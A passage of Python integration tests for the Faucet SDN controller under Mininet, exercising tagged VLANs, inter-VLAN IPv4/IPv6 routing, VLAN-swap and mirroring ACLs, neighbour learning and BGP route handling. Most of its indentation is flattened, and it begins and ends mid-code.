self.quiet_commands(host, setup_commands)
return required_ipds, ipd_to_macvlan
def verify_drop_rules(self, required_ipds, ipd_to_macvlan):
for _ in range(10):
if not required_ipds:
break
drop_rules = self.get_matching_flows_on_dpid(
self.dpid, {'dl_type': self.ETH_TYPE, 'dl_vlan': str(self.GLOBAL_VID)},
table_id=self.fib_table(), actions=[])
if drop_rules:
for drop_rule in drop_rules:
match = drop_rule['match']
del match['dl_type']
del match['dl_vlan']
self.assertEqual(1, len(match))
ipd = list(match.values())[0].split('/')[0]
if ipd in required_ipds:
required_ipds.remove(ipd)
for ipd in required_ipds:
macvlan_int, host = ipd_to_macvlan[ipd]
host.cmd(self.fping(macvlan_int, ipd))
time.sleep(1)
self.assertFalse(required_ipds, msg='no drop rules for %s' % required_ipds)
def verify_routing_performance(self, first_host, second_host):
for first_host_ip, second_host_ip in (
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[0], 2)),
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[-1], 2)),
(self.netbase(self.NEW_VIDS[-1], 1), self.netbase(self.NEW_VIDS[0], 2))):
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.scapy_bcast(first_host))
def verify_l3_mesh(self, first_host, second_host):
for vid in self.NEW_VIDS:
macvlan_int = 'macvlan%u' % vid
first_host_ip = self.netbase(vid, 1)
second_host_ip = self.netbase(vid, 2)
self.macvlan_ping(first_host, second_host_ip.ip, macvlan_int)
self.macvlan_ping(second_host, first_host_ip.ip, macvlan_int)
def verify_l3_hairpin(self, first_host):
macvlan1_int = 'macvlan%u' % self.NEW_VIDS[0]
macvlan2_int = 'macvlan%u' % self.NEW_VIDS[1]
macvlan2_ip = self.netbase(self.NEW_VIDS[1], 1)
macvlan1_gw = self.netbase(self.NEW_VIDS[0], 254)
macvlan2_gw = self.netbase(self.NEW_VIDS[1], 254)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
[self.run_ip('link set %s netns %s' % (macvlan2_int, netns))])
for exec_cmd in (
(self.run_ip('address add %s/%u dev %s' % (macvlan2_ip.ip, self.NETPREFIX, macvlan2_int)),
self.run_ip('link set %s up' % macvlan2_int),
self.run_ip('route add default via %s' % macvlan2_gw.ip))):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
setup_cmds.append(
self.run_ip('route add %s via %s' % (macvlan2_ip, macvlan1_gw.ip)))
self.quiet_commands(first_host, setup_cmds)
self.macvlan_ping(first_host, macvlan2_ip.ip, macvlan1_int)
def test_tagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
required_ipds, ipd_to_macvlan = self.configure_mesh(first_host, second_host)
self.verify_drop_rules(required_ipds, ipd_to_macvlan)
self.verify_routing_performance(first_host, second_host)
self.verify_l3_mesh(first_host, second_host)
self.verify_l3_hairpin(first_host)
self.verify_ping_mirrored(first_host, second_host, mirror_host)
self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedGlobalIPv6RouteTest(FaucetTaggedGlobalIPv4RouteTest):
IPV = 6
NETPREFIX = 112
ETH_TYPE = IPV6_ETH
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 103))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
def netbase(self, vid, host):
return ipaddress.ip_interface('fc00::%u:%u' % (vid, host))
def fib_table(self):
return self._IPV6_FIB_TABLE
def fping(self, macvlan_int, ipg):
return 'fping6 %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv6_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["fc00::%u:254/112"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v6: True
max_wildcard_table_size: 512
table_sizes:
vlan: 256
vip: 128
flood: 384
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(), '%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
class FaucetTaggedScaleTest(FaucetTaggedTest):
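    """Test host learning at scale across many tagged VLANs on the same ports."""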
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
VIDS = _vids()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
CONFIG_GLOBAL = """
vlans:
""" + '\n'.join(['\n'.join(
(' %u:',
' description: "tagged"')) % i for i in VIDS])
CONFIG = """
interfaces:
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
""" % ('%(port_1)d', ','.join(STR_VIDS),
'%(port_2)d', ','.join(STR_VIDS),
'%(port_3)d', ','.join(STR_VIDS),
'%(port_4)d', ','.join(STR_VIDS))
def test_tagged(self):
self.ping_all_when_learned()
for host in self.hosts_name_ordered():
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
setup_commands.extend([
'ip link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid),
'ip link set dev %s up' % vlan_int])
self.quiet_commands(host, setup_commands)
for host in self.hosts_name_ordered():
rdisc6_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
rdisc6_commands.append(
'rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int)
self.quiet_commands(host, rdisc6_commands)
        for vlan in self.NEW_VIDS:
            for _ in range(3):
                for host in self.hosts_name_ordered():
                    # Solicit on this host's subinterface for the VLAN under test.
                    vlan_int = '%s.%u' % (host.intf_root_name, vlan)
                    self.quiet_commands(
                        host,
                        ['rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int])
vlan_hosts_learned = self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': str(vlan)})
if vlan_hosts_learned == len(self.hosts_name_ordered()):
break
time.sleep(1)
self.assertGreater(
vlan_hosts_learned, 1,
msg='not all VLAN %u hosts learned (%u)' % (vlan, vlan_hosts_learned))
class FaucetTaggedBroadcastTest(FaucetTaggedTest):
def test_tagged(self):
super(FaucetTaggedBroadcastTest, self).test_tagged()
self.verify_broadcast()
self.verify_no_bcast_to_self()
class FaucetTaggedExtLoopProtectTest(FaucetTaggedTest):
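    """Test loop_protect_external: flooding is restricted between externally loop-protected ports but not internal ports."""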
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_2)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
ext_port1, ext_port2, int_port1, int_port2 = self.hosts_name_ordered()
self.verify_broadcast((ext_port1, ext_port2), False)
self.verify_broadcast((int_port1, int_port2), True)
self.verify_unicast((int_port1, int_port2), True)
class FaucetTaggedWithUntaggedTest(FaucetTaggedTest):
N_UNTAGGED = 0
N_TAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 200
tagged_vlans: [100]
%(port_2)d:
native_vlan: 200
tagged_vlans: [100]
%(port_3)d:
native_vlan: 200
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
tagged_vlans: [100]
"""
def test_tagged(self):
self.ping_all_when_learned()
native_ips = [
ipaddress.ip_interface('10.99.99.%u/24' % (i + 1)) for i in range(len(self.hosts_name_ordered()))]
for native_ip, host in zip(native_ips, self.hosts_name_ordered()):
self.host_ipv4_alias(host, native_ip, intf=host.intf_root_name)
for own_native_ip, host in zip(native_ips, self.hosts_name_ordered()):
for native_ip in native_ips:
if native_ip != own_native_ip:
self.one_ipv4_ping(host, native_ip.ip, intf=host.intf_root_name)
class FaucetTaggedSwapVidMirrorTest(FaucetTaggedTest):
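    """Test an ACL that mirrors and swaps the VLAN VID: the output port sees the swapped VID, the mirror port the original."""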
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
swap_vid: 101
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_acl(tcpdump_host, tcpdump_filter):
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
tcpdump_filter, tcpdump_txt))
# Saw swapped VID on second host
test_acl(second_host, 'vlan 101')
# Saw original VID on mirror host
test_acl(third_host, 'vlan 100')
class FaucetTaggedOrderedSwapVidMirrorTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "tagged"
acls:
1:
- rule:
vlan_vid: 100
actions:
mirror: %(port_3)d
force_port_vlan: 1
output:
- swap_vid: 101
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_acl(tcpdump_host, tcpdump_filter):
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
tcpdump_filter, tcpdump_txt))
# Saw swapped VID on second host
test_acl(second_host, 'vlan 101')
# Saw original VID on mirror host
test_acl(third_host, 'vlan 100')
class FaucetTaggedSwapVidOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
swap_vid: 101
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
        # We expect to see the swapped VLAN VID.
tcpdump_filter = 'vlan 101'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 101', tcpdump_txt))
class FaucetTaggedSwapVidOrderedOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
101:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
actions:
output:
- swap_vid: 101
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [101]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
        # We expect to see the swapped VLAN VID.
tcpdump_filter = 'vlan 101'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 101', tcpdump_txt))
class FaucetTaggedPopVlansOutputTest(FaucetTaggedTest):
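    """Test an ACL output action that rewrites the destination MAC and pops the VLAN tag."""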
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
pop_vlans: 1
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = 'not vlan and icmp and ether dst 06:06:06:06:06:06'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(
' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=10, root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedPopVlansOrderedOutputTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
unicast_flood: False
acls:
1:
- rule:
vlan_vid: 100
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- pop_vlans: 1
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_tagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
tcpdump_filter = 'not vlan and icmp and ether dst 06:06:06:06:06:06'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(
' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
packets=10, root_intf=True)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
class FaucetTaggedIPv4ControlPlaneTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.one_ipv4_ping(first_host, second_host.IP())
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
class FaucetTaggedIPv6ControlPlaneTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
class FaucetTaggedICMPv6ACLTest(FaucetTaggedTest):
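    """Test an ACL that matches ICMPv6 neighbour solicitation for a specific target address."""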
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')
CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_icmpv6_acl_match(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
self.wait_nonzero_packet_count_flow(
{'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedICMPv6OrderedACLTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: %u
vlan_vid: 100
ip_proto: 58
icmpv6_type: 135
ipv6_nd_target: "fc00::1:2"
actions:
output:
- port: %s
- rule:
actions:
allow: 1
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
""" % (IPV6_ETH, '%(port_2)d')
CONFIG = """
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
acl_in: 1
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""
def test_icmpv6_acl_match(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
self.one_ipv6_ping(first_host, 'fc00::1:2')
self.wait_nonzero_packet_count_flow(
{'dl_type': IPV6_ETH, 'ip_proto': 58, 'icmpv6_type': 135,
'ipv6_nd_target': 'fc00::1:2'}, table_id=self._PORT_ACL_TABLE)
class FaucetTaggedIPv4RouteTest(FaucetTaggedTest):
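    """Test static IPv4 routes on a tagged VLAN, across host MAC swaps, cold starts and unrelated warm-start changes."""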
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
200:
description: "not used"
300:
description: "not used"
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
native_vlan: 200
"""
def test_tagged(self):
self._enable_event_log()
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_routed_ip = ipaddress.ip_interface('10.0.1.1/24')
second_host_routed_ip = ipaddress.ip_interface('10.0.2.1/24')
for _coldstart in range(2):
for _swaps in range(3):
self.verify_ipv4_routing(
first_host, first_host_routed_ip,
second_host, second_host_routed_ip)
self.swap_host_macs(first_host, second_host)
self.coldstart_conf()
# A change to a VLAN/ports not involved in routing should be a warm start.
for vid in (300, 200):
self.change_port_config(
self.port_map['port_4'], 'native_vlan', vid,
restart=True, cold_start=False)
self.wait_until_matching_lines_from_file(
r'.+L3_LEARN.+10.0.0.[12].+', self.event_log)
class FaucetTaggedTargetedResolutionIPv4RouteTest(FaucetTaggedIPv4RouteTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
targeted_gw_resolution: True
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
"""
class FaucetTaggedProactiveNeighborIPv4RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_alias_ip = ipaddress.ip_interface('10.0.0.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.add_host_route(second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.assertGreater(
self.scrape_prometheus_var(
'vlan_neighbors', {'ipv': '4', 'vlan': '100'}),
1)
class FaucetTaggedProactiveNeighborIPv6RouteTest(FaucetTaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:3/64"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_alias_ip = ipaddress.ip_interface('fc00::1:99/64')
faucet_vip_ip = ipaddress.ip_interface('fc00::1:3/126')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.add_host_ipv6_address(first_host, ipaddress.ip_interface('fc00::1:1/64'))
# We use a narrower mask to force second_host to use the /128 route,
# since otherwise it would realize :99 is directly connected via ND and send to it directly.
self.add_host_ipv6_address(second_host, ipaddress.ip_interface('fc00::1:2/126'))
self.add_host_ipv6_address(first_host, first_host_alias_ip)
self.add_host_route(second_host, first_host_alias_host_ip, faucet_vip_ip.ip)
self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
self.assertGreater(
self.scrape_prometheus_var(
'vlan_neighbors', {'ipv': '6', 'vlan': '100'}),
1)
class FaucetUntaggedIPv4GlobalInterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
200:
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC2 + """
routers:
global:
vlans: [100, 200]
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
global_vlan: 300
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 200
"""
exabgp_peer_conf = """
static {
route 10.99.99.0/24 next-hop 10.200.0.1 local-preference 100;
route 10.0.5.0/24 next-hop 127.0.0.1;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'), vlan_vid=300)
self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
class FaucetUntaggedIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
for vlanb_vid in (300, 200):
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(first_host, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(second_host, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
self.change_vlan_config(
'vlanb', 'vid', vlanb_vid, restart=True, cold_start=True)
class FaucetUntaggedPortSwapIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
vlana:
vid: 100
faucet_vips: ["10.100.0.254/24", "169.254.1.1/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24", "169.254.2.1/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [vlana, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: vlana
%(port_2)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
def test_connectivity(host_a, host_b):
host_a.setIP(str(first_host_ip.ip), prefixLen=24)
host_b.setIP(str(second_host_ip.ip), prefixLen=24)
self.add_host_route(host_a, second_host_ip, first_faucet_vip.ip)
self.add_host_route(host_b, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(host_a, second_host_ip.ip)
self.one_ipv4_ping(host_b, first_host_ip.ip)
self.assertEqual(
self._ip_neigh(host_a, first_faucet_vip.ip, 4), self.FAUCET_MAC)
self.assertEqual(
self._ip_neigh(host_b, second_faucet_vip.ip, 4), self.FAUCET_MAC2)
test_connectivity(first_host, second_host)
# Delete port 1, add port 3
self.change_port_config(
self.port_map['port_1'], None, None,
restart=False, cold_start=False)
self.add_port_config(
self.port_map['port_3'], {'native_vlan': 'vlana'},
restart=True, cold_start=True)
test_connectivity(third_host, second_host)
class FaucetUntaggedExpireIPv4InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["10.100.0.254/24"]
vlanb:
vid: 200
faucet_vips: ["10.200.0.254/24"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
max_host_fib_retry_count: 2
proactive_learn_v4: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
first_host_ip = ipaddress.ip_interface('10.100.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.100.0.254/24')
second_host_ip = ipaddress.ip_interface('10.200.0.1/24')
second_faucet_vip = ipaddress.ip_interface('10.200.0.254/24')
first_host, second_host = self.hosts_name_ordered()[:2]
first_host.setIP(str(first_host_ip.ip), prefixLen=24)
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
